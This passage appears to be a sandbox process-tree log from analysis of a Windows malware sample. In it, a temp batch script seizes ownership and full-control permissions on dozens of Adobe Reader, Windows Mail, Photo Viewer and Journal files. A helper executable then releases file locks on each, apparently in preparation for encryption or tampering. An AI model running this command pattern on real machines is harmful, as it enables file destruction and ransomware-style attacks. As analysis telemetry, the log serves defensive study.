    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:556
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:1956
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:784
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    - Modifies file permissions
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    - Modifies file permissions
    PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:556
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:996
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1720
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1908
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1556
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1604
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:336
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:1956
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:236
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    PID:792
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      PID:936
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    PID:996
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      PID:212
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      PID:784
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui"
    3⤵
    PID:792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:916
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:876
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui""
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui"
    3⤵
    - Modifies file permissions
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1092
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui""
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:884
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:340
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui""
  2⤵
  PID:824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui"
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:596
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""
  2⤵
  PID:1712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C
    3⤵
    PID:996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"
    3⤵
    - Modifies file permissions
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Dotted_Line.jtp" -nobanner
    3⤵
    PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Dotted_Line.jtp" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:884
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:528
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:1064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1660
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1608
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1880
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1492
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  PID:784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    PID:1660
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      PID:876
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:1204
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    - Modifies file permissions
    PID:616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:1672
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:1492
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    - Modifies file permissions
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "main.css" -nobanner
    3⤵
    PID:824
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "main.css" -nobanner
      4⤵
      PID:876
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    - Modifies file permissions
    PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:1608
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:1204
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\cacls.exe
